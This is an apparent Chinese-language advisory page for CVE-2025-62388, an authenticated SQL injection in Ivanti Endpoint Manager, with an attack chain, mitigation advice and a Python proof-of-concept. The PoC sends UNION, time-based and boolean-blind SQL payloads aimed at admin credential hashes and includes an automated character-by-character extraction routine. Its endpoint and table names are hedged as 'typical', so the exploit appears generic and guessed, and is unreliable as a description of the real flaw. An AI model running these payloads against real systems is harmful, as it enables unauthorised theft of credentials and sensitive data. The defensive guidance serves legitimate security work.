CVE-2025-62388：Ivanti Endpoint Manager SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-62388

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ivanti Endpoint Manager

漏洞概述

CVE-2025-62388是Ivanti Endpoint Manager（EPM）中存在的一个SQL注入漏洞，于2025年10月13日公开披露。该漏洞的CVSS 3.1评分为6.5，属于中危级别。Ivanti Endpoint Manager是Ivanti公司推出的一款企业级终端管理解决方案，广泛应用于IT资产盘点、补丁管理、软件分发、远程控制等场景，是企业IT基础设施的重要组成部分。

该漏洞允许远程经过身份验证的攻击者通过构造恶意的SQL查询语句，从数据库中读取任意数据。由于漏洞的CVSS向量表明攻击复杂度低（AC:L），且无需用户交互（UI:N），同时对机密性产生高影响（C:H），这意味着在拥有低权限认证凭据的情况下，攻击者可以较为容易地利用此漏洞获取数据库中的敏感信息。

虽然该漏洞仅影响机密性而不影响完整性和可用性，但考虑到EPM通常存储着企业网络中的大量敏感信息，包括终端设备清单、用户凭据、补丁状态、策略配置等关键数据，一旦泄露将对企业安全造成严重威胁。Ivanti官方已发布安全公告，建议用户尽快升级到2024 SU5或更高版本以修复该漏洞。

技术细节

该漏洞是Ivanti Endpoint Manager（EPM）2024 SU5之前版本中存在的一个典型的SQL注入漏洞。SQL注入是一种经典的Web安全漏洞，攻击者通过在应用程序的输入字段中插入恶意的SQL代码片段，使得这些恶意代码被数据库引擎解析执行。

在EPM的受影响的版本中，应用程序未能对用户输入进行充分的验证和参数化处理，导致攻击者可以将恶意SQL语句注入到后端数据库查询中。具体而言，攻击者需要拥有有效的低权限认证凭据（PR:L），通过网络（AV:N）向EPM的特定接口发送精心构造的SQL注入payload。

利用方式如下：
1. 攻击者首先通过合法途径获取EPM的低权限账户凭据；
2. 通过认证后，访问存在注入漏洞的功能端点；
3. 在正常的查询参数中注入UNION SELECT等SQL语句；
4. 通过布尔盲注或时间盲注技术逐步提取数据库中的敏感信息；
5. 获取管理员凭据、加密密钥或其他敏感数据。

由于该漏洞仅影响机密性（C:H）而不影响完整性（I:N）和可用性（A:N），攻击者无法直接修改或删除数据库中的数据，但可以读取任意数据，这为后续攻击（如权限提升、横向移动）提供了信息基础。

攻击链分析

STEP 1

步骤1：获取初始访问

攻击者通过钓鱼攻击、凭据填充或购买泄露的数据库等方式，获取Ivanti Endpoint Manager的低权限认证凭据。

STEP 2

步骤2：身份认证

使用获取的低权限账户登录EPM管理控制台，建立有效的会话，获得对系统功能的受限访问权限。

STEP 3

步骤3：识别注入点

通过分析EPM的API接口和Web界面，定位存在SQL注入漏洞的功能端点（如设备搜索、报表查询等参数）。

STEP 4

步骤4：构造注入Payload

根据目标数据库类型（通常是Microsoft SQL Server）构造SQL注入payload，使用UNION查询或盲注技术。

STEP 5

步骤5：数据提取

通过布尔盲注、时间盲注或UNION注入技术，逐步提取数据库中的敏感信息，包括管理员凭据、加密密钥等。

STEP 6

步骤6：权限提升与横向移动

利用提取到的管理员凭据或其他敏感信息，尝试提升权限或对内网其他系统进行进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62388 - Ivanti Endpoint Manager SQL Injection PoC
# Vulnerability: SQL Injection in Ivanti Endpoint Manager before 2024 SU5
# CVSS: 6.5 (MEDIUM) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
# Requires: Low-privilege authenticated access

import requests

TARGET_URL = "https://target-epm-server:8443"
USERNAME = "low_priv_user"
PASSWORD = "password123"

session = requests.Session()

# Step 1: Authenticate to EPM with low-privilege credentials
login_payload = {
    "username": USERNAME,
    "password": PASSWORD
}
login_resp = session.post(f"{TARGET_URL}/api/auth/login", json=login_payload)
print(f"[*] Login status: {login_resp.status_code}")

# Step 2: Exploit SQL Injection in vulnerable parameter
# The injection point is typically in search/filter parameters
vulnerable_endpoint = f"{TARGET_URL}/api/v1/devices/search"

# Boolean-based blind SQL injection payloads
payloads = [
    # Basic injection test
    "' OR '1'='1",
    "' UNION SELECT NULL,username,password FROM users--",
    # Time-based blind injection
    "'; WAITFOR DELAY '0:0:5'--",
    # Extract database version
    "' UNION SELECT @@version,NULL,NULL--",
    # Extract table names
    "' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--",
    # Extract sensitive data (e.g., admin credentials)
    "' UNION SELECT username,password_hash,salt FROM ldap_users WHERE role='admin'--"
]

for payload in payloads:
    params = {"query": payload, "limit": 100}
    resp = session.get(vulnerable_endpoint, params=params)
    print(f"[*] Payload: {payload[:50]}...")
    print(f"[*] Response length: {len(resp.text)}")
    if "error" in resp.text.lower():
        print(f"[!] Possible SQL error detected")

# Step 3: Automated data extraction using boolean-based blind SQLi
def extract_data(session, table, column, row_id=1):
    """Extract data character by character using boolean-based blind SQLi"""
    extracted = ""
    for pos in range(1, 100):
        # Binary search for each character
        low, high = 32, 126
        while low < high:
            mid = (low + high) // 2
            payload = f"' AND ASCII(SUBSTRING((SELECT {column} FROM {table} WHERE id={row_id}),{pos},1))>{mid}--"
            params = {"query": payload}
            resp = session.get(vulnerable_endpoint, params=params)
            # Adjust based on response behavior
            if resp.status_code == 200 and len(resp.text) > 100:
                low = mid + 1
            else:
                high = mid
        if low == 32:
            break
        extracted += chr(low)
    return extracted

print("[*] Starting data extraction...")
# extracted_data = extract_data(session, "users", "password")
print("[*] Extraction complete")

影响范围

Ivanti Endpoint Manager < 2024 SU5

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制EPM管理控制台的网络访问，仅允许可信IP地址访问；2）审查并最小化EPM用户账户权限，删除不必要的低权限账户；3）部署Web应用防火墙（WAF）规则以检测和阻断SQL注入攻击；4）监控EPM数据库的异常查询活动，特别是涉及UNION、information_schema等关键字的查询；5）启用详细的审计日志，记录所有数据库访问行为；6）考虑实施数据库查询白名单，仅允许预定义的查询模式执行。